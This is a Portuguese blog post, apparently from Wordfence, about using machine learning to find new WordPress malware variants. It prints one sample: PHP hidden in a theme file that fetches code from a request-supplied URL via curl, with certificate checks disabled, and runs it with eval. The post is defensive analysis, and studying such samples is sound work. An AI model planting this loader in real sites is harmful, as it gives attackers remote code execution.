O Wordfence é o líder em segurança do WordPress, protegendo mais de 4 milhões de sites WordPress de ataques maliciosos. Com novas variantes de malware descobertas diariamente, agora temos uma nova arma em nosso arsenal contra ataques de WordPress: aprendizado de máquina.
Como o Wordfence identifica malware
Durante anos, a equipe do Wordfence Threat Intelligence se manteve à frente dos invasores, identificando rapidamente novas variantes de malware à medida que surgiam. Somente em 2020, nossa equipe identificou 1.000.994 novos arquivos de malware e implantou rapidamente 957 assinaturas de malware para detectá-los. Essas assinaturas identificam e correspondem aos padrões usados pelos autores de malware, alertando os proprietários de sites do WordPress quando um malware é encontrado.
Embora a maioria dos novos exemplos sejam semelhantes a malware que vimos antes, alguns ocasionalmente escapam às nossas assinaturas, geralmente por meio de mutações evasivas no código. Eles são frequentemente encontrados por nossa equipe de limpeza de sites durante investigações forenses.
A identificação humana de variantes indetectáveis de malware pode ser um processo entediante, exigindo testes e verificação para garantir que nossas assinaturas de malware identifiquem com precisão o malware emergente e, ao mesmo tempo, garantam que não acionem falsos positivos em código válido usado em milhões de Sites WordPress.
Em um esforço para identificar mais rapidamente malware novo e emergente, a equipe do Wordfence Threat Intelligence implementou o aprendizado de máquina para complementar os esforços de nossa equipe.
O que é aprendizado de máquina?
O aprendizado de máquina é uma classe de algoritmos de computador que usa dados de treinamento para construir um modelo que pode reconhecer padrões em conjuntos de dados muito grandes. Para aplicar o aprendizado de máquina de maneira eficaz, é importante ter dados de treinamento de alta qualidade.
A equipe do Wordfence tem, possivelmente, a maior coleção de malware específico para WordPress do mundo. Essas amostras de malware foram cuidadosamente classificadas e selecionadas, o que nos deu um conjunto de dados de treinamento de qualidade extremamente alta para nossos algoritmos de aprendizado de máquina.
O aprendizado de máquina capacita uma série de algoritmos que experimentamos diariamente. O conteúdo recomendado no Netflix, Spotify ou YouTube, por exemplo, é alimentado por aprendizado de máquina. Esses algoritmos treinam os padrões de consumo de mídia de milhões de usuários e fazem previsões sobre o que os outros podem gostar.
Usando aprendizado de máquina para identificar malware emergente
O malware é desenvolvido para uma ampla variedade de finalidades, como backdoor, injeção de spam ou redirecionamento malicioso. O malware específico do WordPress pode ser estruturado para se ocultar à vista de todos.
Embora o malware possa ser encontrado durante verificações, investigações e manutenção, o trabalho do Wordfence no aprendizado de máquina reduziu significativamente o tempo necessário para identificar malware, como o exemplo mostrado abaixo.
Malware escondido à vista de todos
error_reporting (0); $ ch=curl_init ($ _ GET ['url']); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ ch, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv: 32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ ch, CURLOPT_COOKIEJAR, $ GLOBALS ['coki']); curl_setopt ($ ch, CURLOPT_COOKIEFILE, $ GLOBALS ['coki']); $ output=curl_exec ($ ch); eval ('?>'. $ output); $ basepath=dirname (__ FILE__); function get_file ($ path) { if (function_exists ('realpath')) $ path=realpath ($ path); if (! $ path ||! @is_file ($ path)) retorna falso; return @file_get_contents ($ path); }
O exemplo acima é um trecho do que parece ser um arquivo de tema. Originalmente, ele pode ter sido responsável por recuperar as atualizações dos arquivos de tema. Mas, com essa infecção, ele também pode buscar uma carga de código malicioso, executando-a no site infectado. Esse malware pode ser usado para adicionar redirecionamentos maliciosos, backdoors, arquivos de spam ou links de spam ou até mesmo para manter o acesso persistente a um site infectado.
O malware está tentando”se esconder à vista de todos”, disfarçando-se o menos possível. Ele entra em contato com um endereço da web por meio de curl e executa o código que retorna, permitindo que um novo malware seja implantado por um invasor sob demanda.
O software premium geralmente inclui scripts de componentes de “atualização” e “instalador” que se comportam de maneira semelhante. O código malicioso, embora suspeito, não estaria fora do lugar em muitos temas ou plug-ins premium do WordPress, o que o torna mais difícil de identificar.
Por ser uma nova variante, ela não corresponde aos nossos padrões de malware existentes. Em uma inspeção manual, um analista humano identificaria rapidamente isso como malware, mas revisar manualmente cada novo arquivo exige muito trabalho e não tem uma boa escalabilidade. O aprendizado de máquina automatiza esse processo e nos permite identificar variantes emergentes de malware com muito mais rapidez do que uma grande equipe de analistas humanos poderia.
O aprendizado de máquina multiplica efetivamente nossa capacidade de fazer avaliações iniciais, localizando código suspeito sem exigir um padrão ou heurística específica. Isso libera nossos analistas para que eles possam concentrar sua energia em tarefas de inteligência humana mais importantes, como decidir entre uma máquina de café Nespresso ou Keurig para as investigações noturnas.
Depois que nossos algoritmos de aprendizado de máquina identificam malware emergente, como o exemplo acima, um analista do Wordfence verifica a descoberta, cria uma nova regra de firewall se necessário e cria uma nova assinatura de malware para detectar o malware, que é então liberada para nosso Clientes premium do Wordfence em tempo real.
Conclusão
O Wordfence continua avaliando novas tecnologias. Em 2015, já tínhamos um personalizado cluster construído de processadores GPU em produção para ajudar nossos clientes a escolherem senhas mais seguras. Nem todos os nossos experimentos chegam à produção, mas o aprendizado de máquina surgiu de um projeto de pesquisa em nossa organização em uma tecnologia de produção que permite a identificação rápida de ameaças emergentes de malware.
Gostaríamos de agradecer especialmente aos nossos clientes WordPress Premium, que tornam possível este tipo de implementação de ponta. Como os agentes maliciosos continuam a visar o WordPress, o Wordfence continua a ser o líder em garantir que os 4 milhões de sites protegidos pelo Wordfence permaneçam seguros.
Agradecimentos especiais ao engenheiro de controle de qualidade e analista de ameaças Ram Gall por sua ajuda com esta postagem do blog.
A postagem Máquina Aprender dá uma vantagem ao Wordfence apareceu primeiro no Wordfence .
